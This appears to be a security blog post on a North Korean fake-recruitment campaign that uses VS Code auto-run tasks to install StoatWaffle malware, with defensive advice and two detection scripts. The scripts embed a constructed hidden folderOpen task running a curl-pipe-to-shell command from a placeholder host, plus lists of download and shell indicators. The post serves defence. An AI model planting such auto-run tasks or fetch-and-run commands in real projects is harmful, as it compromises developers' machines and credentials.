When the Interview Runs Code: The Developer Who Let Malware In
- Javier Conejo del Cerro
- 24 Mar
- 3 min read

North Korean threat actors behind the Contagious Interview campaign have folded malware delivery directly into developer workflows. By abusing Visual Studio Code's automatic tasks, they turn a trusted editor into an execution vector and deploy the StoatWaffle malware family without asking the target to run anything. This is a meaningful shift: the attack no longer depends on persuading the user to execute a script by hand; it runs the moment the developer opens and trusts the project.
Phase 1: Deception & Delivery
The attack begins with highly convincing fake recruitment processes, often initiated through LinkedIn. Targets—typically senior developers, founders, and CTOs in cryptocurrency and Web3 sectors—are invited to participate in technical interviews that mirror legitimate hiring workflows.
Victims are provided with coding exercises hosted on platforms like GitHub, GitLab, or Bitbucket. These repositories appear authentic, containing structured projects and realistic codebases. Embedded in them, however, is a malicious task definition: the .vscode/tasks.json file that VS Code reads for the workspace's build and run tasks.
By setting a task's runOptions.runOn property to "folderOpen", attackers ensure that the moment the developer opens the project in VS Code, the task is started automatically with no further interaction. The one gate is Workspace Trust: VS Code does not run tasks in Restricted Mode, so the chain depends on the target choosing "Yes, I trust the authors" when the folder is opened, which is exactly what a candidate handed a take-home exercise by a supposed employer is expected to do.
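To make the mechanism concrete, the following Python script is an added example written for this post, not code from the article, from VS Code, or from the campaign. It embeds a constructed tasks.json that follows the pattern described above (an ordinary build task next to a hidden task whose runOptions.runOn is "folderOpen"), parses it the way VS Code does (JSONC, so comments and trailing commas are allowed), and reports every task that would start on folder open. It also checks a user settings.json for the task.allowAutomaticTasks hardening. The example.invalid host and the setup.sh name are placeholders, not indicators from the campaign; a real audit runs scan_tree on a fresh checkout before the folder is trusted.

```python
import json
import re
from pathlib import Path

# Constructed sample: the shape of a .vscode/tasks.json that runs a shell command the moment
# the folder is opened. The command is a harmless placeholder on a reserved domain, not the
# campaign's actual payload. VS Code parses tasks.json as JSONC (comments, trailing commas).
SAMPLE_TASKS_JSON = r'''{
  // looks like an ordinary build setup
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build",
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    }
  ]
}'''

# Substrings worth a second look in an auto-run command (matched case-insensitively).
INDICATORS = ("curl", "wget", "invoke-webrequest", "iwr", "iex", "-encodedcommand",
              "node -e", "| sh", "| bash", "base64")


def strip_jsonc(text):
    """Drop // and /* */ comments outside strings, then trailing commas, so json.loads accepts it."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:          # keep the escaped character, including \"
                out.append(text[i + 1]); i += 2; continue
            in_str = c != '"'
            i += 1
        elif c == '"':
            in_str = True; out.append(c); i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i); i = n if j < 0 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j < 0 else j + 2
        else:
            out.append(c); i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def _command_text(task):
    """Flatten command and args, including per-OS overrides and the {"value": ...} quoted form."""
    parts = []
    for scope in (task, task.get("windows") or {}, task.get("linux") or {}, task.get("osx") or {}):
        cmd = scope.get("command")
        if isinstance(cmd, dict):
            cmd = cmd.get("value")
        if cmd:
            parts.append(str(cmd))
        for arg in scope.get("args") or []:
            parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)


def find_autorun_tasks(tasks_json_text):
    """Return every task VS Code would start on folder open, with the reasons it looks suspicious."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = _command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            # "reveal": "never" keeps the terminal panel closed, so the victim sees nothing run
            "hidden": (task.get("presentation") or {}).get("reveal") == "never",
            "indicators": [s for s in INDICATORS if s in cmd.lower()],
        })
    return findings


def automatic_tasks_allowed(settings_json_text):
    """True unless settings.json sets task.allowAutomaticTasks to "off".
    A missing key is treated as not hardened: VS Code then uses its default, not "off"."""
    settings = json.loads(strip_jsonc(settings_json_text))
    return settings.get("task.allowAutomaticTasks") != "off"


def scan_tree(root):
    """Audit every .vscode/tasks.json under a checkout before trusting the workspace."""
    results = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name == ".vscode":
            results[str(path)] = find_autorun_tasks(path.read_text(encoding="utf-8"))
    return results


if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"auto-run task {f['label']!r}: hidden={f['hidden']} indicators={f['indicators']}")
        print(f"  command: {f['command']}")
```

On the sample, the "build" task is ignored and the "setup" task is reported as hidden with the curl and pipe-to-shell indicators. The same parser serves both checks because settings.json is JSONC as well; run scan_tree against a clone made in a throwaway VM rather than against the folder you are about to trust in your daily editor.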
Phase 2: Automatic Execution & Environment Setup
Once triggered, the malicious task initiates a download from external infrastructure, initially hosted on Vercel and later evolving to GitHub Gist to evade detection.
The payload first checks its environment, starting with whether Node.js is present. If it is not, the malware fetches the installer from the official distribution site and installs it silently, giving the later stages a uniform runtime on every operating system it targets. For defenders this is itself a signal: a Node.js installation initiated from an editor session, on a machine that did not have it before, is unusual and worth an alert.
A staged downloader is then launched, which periodically communicates with a command-and-control (C2) server to retrieve additional payloads. Each stage fetches and executes further Node.js code, creating a modular and resilient infection chain.
Phase 3: Payload Deployment — StoatWaffle
At the core of the attack is StoatWaffle, a modular malware framework built in Node.js. It deploys two primary components:
Stealer Module: Extracts browser credentials and extension data from Chromium-based browsers and Firefox. On macOS systems, it additionally targets the iCloud Keychain database, significantly increasing the value of the stolen data.
RAT Module: Establishes persistent communication with the C2 server, enabling remote command execution. Capabilities include directory enumeration, file upload/download, recursive searches, execution of Node.js and shell commands, and process termination.
This combination allows attackers to fully control the compromised system while harvesting high-value credentials and sensitive data.
Phase 4: Expansion, Ecosystem Abuse & Persistence
The campaign extends beyond VS Code projects into the broader open-source ecosystem. Threat actors distribute malicious npm packages (e.g., PylangGhost), compromise GitHub repositories (e.g., Neutralinojs), and inject obfuscated JavaScript payloads to deliver additional malware such as BeaverTail, InvisibleFerret, and FlexibleFerret.
Newer variants have moved infrastructure from Vercel to GitHub Gist, showing rapid adaptation and evasion. Additional attack chains include fake CAPTCHA pages (ClickFix-style) that trick users into pasting clipboard-injected commands into a terminal or Run dialog, keeping the campaign effective across platforms.
Persistence is maintained through continuous C2 communication and modular payload delivery, while each compromised developer becomes a potential pivot point into corporate infrastructure and cryptocurrency assets.
Defensive Measures
Update VS Code to version 1.109 or later and set task.allowAutomaticTasks to "off" in user settings; check periodically that it has not been switched back on
Audit .vscode/tasks.json (and the tasks section of any .code-workspace file) in repositories you did not author before trusting the workspace; keep unknown folders in Restricted Mode, where tasks do not run
Avoid opening or executing code from unknown or unverified sources, even in interview contexts; a disposable VM or container is the right place for a take-home exercise
Validate recruitment processes and verify company legitimacy before engaging
Monitor for Node.js installations and for network or script activity spawned from the editor's process tree
Implement behavioral EDR capable of detecting staged downloaders and remote execution
Restrict permissions and apply least privilege on developer environments, including credentials and wallets reachable from the workstation
Educate developers on social engineering that targets coding workflows
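The monitoring items above can be turned into a concrete rule. The script below is an added example, not detection content from the article or from any EDR product: it walks a constructed set of process-creation events (pid, parent pid, executable path, command line, in the shape a Linux EDR or auditd-style collector might emit) and flags download tools, pipe-to-shell command lines, and Node.js scripts outside the workspace whenever they descend from a VS Code process. The editor binary names, the workspace path and the example.invalid URLs are assumptions chosen for the sample; adjust EDITOR_NAMES for the platform you collect from.

```python
from pathlib import PurePosixPath

# Constructed process-creation events (not real telemetry). Paths and the example.invalid
# host are placeholders. The first two events are the editor itself and its pty host; the
# chain 4210 -> 4225/4230 -> 4300 mirrors a folderOpen task that downloads and runs a script.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 1,    "exe": "/usr/share/code/code", "cmdline": "/usr/share/code/code /home/dev/interview-task"},
    {"pid": 4150, "ppid": 4100, "exe": "/usr/share/code/code", "cmdline": "/usr/share/code/code --type=ptyHost"},
    {"pid": 4210, "ppid": 4150, "exe": "/bin/bash",  "cmdline": "/bin/bash -c 'curl -s https://example.invalid/setup.sh | sh'"},
    {"pid": 4225, "ppid": 4210, "exe": "/usr/bin/curl", "cmdline": "curl -s https://example.invalid/setup.sh"},
    {"pid": 4230, "ppid": 4210, "exe": "/bin/sh",    "cmdline": "sh"},
    {"pid": 4300, "ppid": 4230, "exe": "/usr/bin/node", "cmdline": "node /tmp/.stage1.js"},
    # a legitimate build started from the same editor session, which must stay quiet
    {"pid": 5000, "ppid": 4150, "exe": "/bin/bash",  "cmdline": "/bin/bash -c 'npm run build'"},
    {"pid": 5010, "ppid": 5000, "exe": "/usr/bin/node", "cmdline": "node /home/dev/interview-task/node_modules/.bin/webpack"},
    # a curl with no editor ancestor, outside the rule's scope
    {"pid": 6000, "ppid": 1,    "exe": "/usr/bin/curl", "cmdline": "curl https://example.invalid/api"},
]

WORKSPACE = "/home/dev/interview-task"          # assumed path of the opened project
# Assumed editor binary basenames for a Linux install; extend per platform.
EDITOR_NAMES = {"code", "code-insiders", "code helper (plugin)"}
DOWNLOADERS = {"curl", "wget", "powershell", "pwsh", "certutil"}


def under_editor(event, by_pid):
    """True if any ancestor of `event` is a VS Code process (matched by executable basename)."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        if PurePosixPath(cur["exe"]).name.lower() in EDITOR_NAMES:
            return True
        cur = by_pid.get(cur["ppid"])
    return False


def detect(events, workspace=WORKSPACE):
    """Return (pid, reason) for each suspicious process that descends from the editor."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not under_editor(e, by_pid):
            continue
        name = PurePosixPath(e["exe"]).name.lower()
        cmd = e["cmdline"]
        if name in DOWNLOADERS:
            alerts.append((e["pid"], "download tool spawned from editor task"))
        elif "| sh" in cmd or "| bash" in cmd:
            alerts.append((e["pid"], "pipe-to-shell from editor task"))
        elif name in {"node", "node.exe"}:
            # first non-option argument is the script; absolute paths outside the workspace
            # (e.g. /tmp, a cache directory, a dotfile) are how a staged downloader runs
            script = next((a for a in cmd.split()[1:] if not a.startswith("-")), "")
            if script.startswith("/") and not script.startswith(workspace.rstrip("/") + "/"):
                alerts.append((e["pid"], f"node running script outside workspace: {script}"))
    return alerts


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

Tuned this way, the npm build spawned by the same editor session stays quiet while the folderOpen chain produces three alerts (the bash -c pipeline, the curl child, and node running a script from /tmp). The same shape of ancestry-plus-behaviour query is what to hunt for retrospectively in EDR data after a developer reports a suspicious interview.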
This campaign represents a significant evolution in attacker strategy: the weaponization of developer trust. By embedding malicious execution into tools and workflows that developers inherently rely on, attackers eliminate the need for traditional exploitation techniques.
The use of auto-run tasks in VS Code demonstrates how even legitimate features can become attack vectors when trust boundaries are crossed. Combined with sophisticated social engineering and modular malware design, the result is a highly effective and scalable intrusion method.
The implications are profound. Developers are no longer just users—they are gateways. Their environments connect directly to source code, infrastructure, and financial assets, making them prime targets for advanced threat actors.
This is not just another malware campaign. It is a reminder that in modern development ecosystems, opening a project can be as dangerous as running a file, and sometimes, they are the same thing.
Source: The Hacker News